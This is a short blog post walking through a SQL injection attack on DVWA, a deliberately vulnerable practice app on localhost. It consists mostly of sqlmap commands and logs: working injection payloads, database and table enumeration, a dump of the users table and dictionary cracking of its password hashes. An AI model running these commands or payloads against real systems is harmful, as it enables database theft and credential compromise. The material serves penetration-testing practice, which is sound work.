05.40
blogkublogmu
if we attacking system through sqlvuln, we must know where vuln to be found, for that we need application wich checking vuln mysql. i use 2 aplication sqlmap, and burpsuite. lets begin to attack, in my article i use simulation use dvwa, this simulation i be user and search database and i will dump that. ok now lets begin, i run burpsuite and open dvwa website to mybrowser with port proxy 8080,
i get "GET /dvwa/vulnerabilities/sqli/?id=%27or+1%3D1%23&Submit=Submit" and "Cookie: security=low; PHPSESSID=1v9l52d4gfr0morfhm1aib3fc0".
now i test it use sqlmap:
root@cupenk:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=1v9l52d4gfr0morfhm1aib3fc0"
sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net
[!] Legal Disclaimer: usage of sqlmap for attacking web servers without prior mutual consent can be considered as an illegal activity. it is the final user's responsibility to obey all applicable local, state and federal laws. authors assume no liability and are not responsible for any misuse or damage caused by this program.
[*] starting at: 20:15:52
[20:15:52] [INFO] using '/pentest/database/sqlmap/output/localhost/session' as session file
[20:15:52] [INFO] testing connection to the target url
[20:15:52] [INFO] testing if the url is stable, wait a few seconds
[20:15:53] [INFO] url is stable
[20:15:53] [INFO] testing if GET parameter 'id' is dynamic
[20:15:53] [WARNING] GET parameter 'id' appears to be not dynamic
[20:15:53] [WARNING] heuristic test shows that GET parameter 'id' might not be injectable
[20:15:53] [INFO] testing sql injection on GET parameter 'id'
[20:15:53] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[20:15:53] [INFO] heuristics detected web page charset 'ascii'
[20:15:53] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[20:15:53] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause' injectable
[20:15:54] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[20:15:54] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[20:16:04] [INFO] GET parameter 'id' is 'MySQL > 5.0.11 AND time-based blind' injectable
[20:16:04] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[20:16:04] [INFO] target url appears to be UNION injectable with 2 columns
[20:16:04] [INFO] GET parameter 'id' is 'MySQL UNION query (NULL) - 1 to 10 columns' injectable
GET parameter 'id' is vulnerable. Do you want to keep testing the others? [y/N] y
[20:16:06] [INFO] testing if GET parameter 'Submit' is dynamic
[20:16:06] [WARNING] GET parameter 'Submit' appears to be not dynamic
[20:16:06] [WARNING] heuristic test shows that GET parameter 'Submit' might not be injectable
[20:16:06] [INFO] testing sql injection on GET parameter 'Submit'
[20:16:06] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[20:16:07] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[20:16:07] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[20:16:07] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
parsed error message(s) showed that the back-end DBMS could be MySQL. Do you want to skip test payloads specific for other DBMSes? [Y/n] y
[20:16:09] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[20:16:10] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[20:16:11] [WARNING] GET parameter 'Submit' is not injectable
sqlmap identified the following injection points with a total of 136 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: id=1' AND (SELECT 233 FROM(SELECT COUNT(*),CONCAT(CHAR(58,120,111,104,58),(SELECT (CASE WHEN (233=233) THEN 1 ELSE 0 END)),CHAR(58,106,108,120,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'eSbn'='eSbn&Submit=Submit
Type: UNION query
Title: MySQL UNION query (NULL) - 1 to 10 columns
Payload: id=1' UNION ALL SELECT NULL, CONCAT(CHAR(58,120,111,104,58),IFNULL(CAST(CHAR(83,118,69,106,87,85,98,113,65,66) AS CHAR),CHAR(32)),CHAR(58,106,108,120,58))# AND 'dMOG'='dMOG&Submit=Submit
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=1' AND SLEEP(5) AND 'Nhlt'='Nhlt&Submit=Submit
---
[20:16:11] [INFO] manual usage of GET payloads requires url encoding
[20:16:11] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
web application technology: PHP 5.3.2, Apache 2.2.14
back-end DBMS: MySQL 5.0
[20:16:11] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/localhost'
[*] shutting down at: 20:16:11
now i check the database
root@cupenk:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=1v9l52d4gfr0morfhm1aib3fc0" --dbs
sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net
[!] Legal Disclaimer: usage of sqlmap for attacking web servers without prior mutual consent can be considered as an illegal activity. it is the final user's responsibility to obey all applicable local, state and federal laws. authors assume no liability and are not responsible for any misuse or damage caused by this program.
[*] starting at: 20:16:35
[20:16:35] [INFO] using '/pentest/database/sqlmap/output/localhost/session' as session file
[20:16:35] [INFO] resuming injection data from session file
[20:16:35] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[20:16:35] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: id=1' AND (SELECT 233 FROM(SELECT COUNT(*),CONCAT(CHAR(58,120,111,104,58),(SELECT (CASE WHEN (233=233) THEN 1 ELSE 0 END)),CHAR(58,106,108,120,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'eSbn'='eSbn&Submit=Submit
Type: UNION query
Title: MySQL UNION query (NULL) - 1 to 10 columns
Payload: id=1' UNION ALL SELECT NULL, CONCAT(CHAR(58,120,111,104,58),IFNULL(CAST(CHAR(83,118,69,106,87,85,98,113,65,66) AS CHAR),CHAR(32)),CHAR(58,106,108,120,58))# AND 'dMOG'='dMOG&Submit=Submit
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=1' AND SLEEP(5) AND 'Nhlt'='Nhlt&Submit=Submit
---
[20:16:35] [INFO] manual usage of GET payloads requires url encoding
[20:16:35] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
web application technology: PHP 5.3.2, Apache 2.2.14
back-end DBMS: MySQL 5.0
[20:16:35] [INFO] fetching database names
available databases [3]:
[*] dvwa
[*] information_schema
[*] mysql
[20:16:35] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/localhost'
[*] shutting down at: 20:16:35
i get the database now how i can dump it?
sqlmap.py: error: no such option: --D
root@cupenk:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=1v9l52d4gfr0morfhm1aib3fc0" -D dvwa --tables
sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net
[!] Legal Disclaimer: usage of sqlmap for attacking web servers without prior mutual consent can be considered as an illegal activity. it is the final user's responsibility to obey all applicable local, state and federal laws. authors assume no liability and are not responsible for any misuse or damage caused by this program.
[*] starting at: 20:20:59
[20:20:59] [INFO] using '/pentest/database/sqlmap/output/localhost/session' as session file
[20:20:59] [INFO] resuming injection data from session file
[20:20:59] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[20:20:59] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: id=1' AND (SELECT 233 FROM(SELECT COUNT(*),CONCAT(CHAR(58,120,111,104,58),(SELECT (CASE WHEN (233=233) THEN 1 ELSE 0 END)),CHAR(58,106,108,120,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'eSbn'='eSbn&Submit=Submit
Type: UNION query
Title: MySQL UNION query (NULL) - 1 to 10 columns
Payload: id=1' UNION ALL SELECT NULL, CONCAT(CHAR(58,120,111,104,58),IFNULL(CAST(CHAR(83,118,69,106,87,85,98,113,65,66) AS CHAR),CHAR(32)),CHAR(58,106,108,120,58))# AND 'dMOG'='dMOG&Submit=Submit
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=1' AND SLEEP(5) AND 'Nhlt'='Nhlt&Submit=Submit
---
[20:20:59] [INFO] manual usage of GET payloads requires url encoding
[20:20:59] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
web application technology: PHP 5.3.2, Apache 2.2.14
back-end DBMS: MySQL 5.0
[20:20:59] [INFO] fetching tables for database: dvwa
Database: dvwa
[2 tables]
+-----------+
| guestbook |
| users |
+-----------+
[20:20:59] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/localhost'
[*] shutting down at: 20:20:59
target dump "users"
root@cupenk:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=1v9l52d4gfr0morfhm1aib3fc0" -T users --dump
sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net
[!] Legal Disclaimer: usage of sqlmap for attacking web servers without prior mutual consent can be considered as an illegal activity. it is the final user's responsibility to obey all applicable local, state and federal laws. authors assume no liability and are not responsible for any misuse or damage caused by this program.
[*] starting at: 20:38:37
[20:38:37] [INFO] using '/pentest/database/sqlmap/output/localhost/session' as session file
[20:38:37] [INFO] resuming injection data from session file
[20:38:37] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[20:38:37] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: id=1' AND (SELECT 233 FROM(SELECT COUNT(*),CONCAT(CHAR(58,120,111,104,58),(SELECT (CASE WHEN (233=233) THEN 1 ELSE 0 END)),CHAR(58,106,108,120,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'eSbn'='eSbn&Submit=Submit
Type: UNION query
Title: MySQL UNION query (NULL) - 1 to 10 columns
Payload: id=1' UNION ALL SELECT NULL, CONCAT(CHAR(58,120,111,104,58),IFNULL(CAST(CHAR(83,118,69,106,87,85,98,113,65,66) AS CHAR),CHAR(32)),CHAR(58,106,108,120,58))# AND 'dMOG'='dMOG&Submit=Submit
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=1' AND SLEEP(5) AND 'Nhlt'='Nhlt&Submit=Submit
---
[20:38:37] [INFO] manual usage of GET payloads requires url encoding
[20:38:37] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
web application technology: PHP 5.3.2, Apache 2.2.14
back-end DBMS: MySQL 5.0
[20:38:37] [WARNING] missing database parameter, sqlmap is going to use the current database to enumerate table(s) entries
[20:38:37] [INFO] fetching current database
[20:38:37] [INFO] read from file '/pentest/database/sqlmap/output/localhost/session': dvwa
[20:38:37] [INFO] fetching columns for table 'users' on database 'dvwa'
[20:38:37] [INFO] read from file '/pentest/database/sqlmap/output/localhost/session': user_id, int(6), first_name, varchar(15), last_name, varchar(15), user, varchar(15), password, varchar(32), avatar, varchar(70)
[20:38:38] [INFO] fetching entries for table 'users' on database 'dvwa'
recognized possible password hash values. do you want to use dictionary attack on retrieved table items? [Y/n/q] y
[20:38:40] [INFO] using hash method: 'md5_generic_passwd'
what's the dictionary's location? [/pentest/database/sqlmap/txt/wordlist.txt]
[20:38:42] [INFO] loading dictionary from: '/pentest/database/sqlmap/txt/wordlist.txt'
do you want to use common password suffixes? (slow!) [y/N] y
[20:38:44] [INFO] starting dictionary attack (md5_generic_passwd)
[20:38:44] [INFO] found: 'abc123' for user: 'gordonb'
[20:38:45] [INFO] found: 'charley' for user: '1337'
[20:38:45] [INFO] found: 'letmein' for user: 'pablo'
[20:38:46] [INFO] found: 'password' for user: 'admin'
[20:39:09] [INFO] 4159708/10006596 words (42%)
Database: dvwa
Table: users
[5 entries]
+--------------------------------------------------+------------+-----------+---------------------------------------------+---------+---------+
| avatar | first_name | last_name | password | user | user_id |
+--------------------------------------------------+------------+-----------+---------------------------------------------+---------+---------+
| http://127.0.0.1/dvwa/hackable/users/pablo.jpg | Pablo | Picasso | 0d107d09f5bbe40cade3de5c71e9e9b7 (letmein) | pablo | 4 |
| http://127.0.0.1/dvwa/hackable/users/gordonb.jpg | Gordon | Brown | e99a18c428cb38d5f260853678922e03 (abc123) | gordonb | 2 |
| http://127.0.0.1/dvwa/hackable/users/admin.jpg | admin | admin | 5f4dcc3b5aa765d61d8327deb882cf99 (password) | admin | 1 |
| http://127.0.0.1/dvwa/hackable/users/smithy.jpg | Bob | Smith | 5f4dcc3b5aa765d61d8327deb882cf99 (password) | smithy | 5 |
| http://127.0.0.1/dvwa/hackable/users/1337.jpg | Hack | Me | 8d3533d75ae2c3966d7e0d4fcc69216b (charley) | 1337 | 3 |
+--------------------------------------------------+------------+-----------+---------------------------------------------+---------+---------+
[20:39:42] [INFO] Table 'dvwa.users' dumped to CSV file '/pentest/database/sqlmap/output/localhost/dump/dvwa/users.csv'
[20:39:42] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/localhost'
[*] shutting down at: 20:39:42
Posted in: security
0 komentar:
Posting Komentar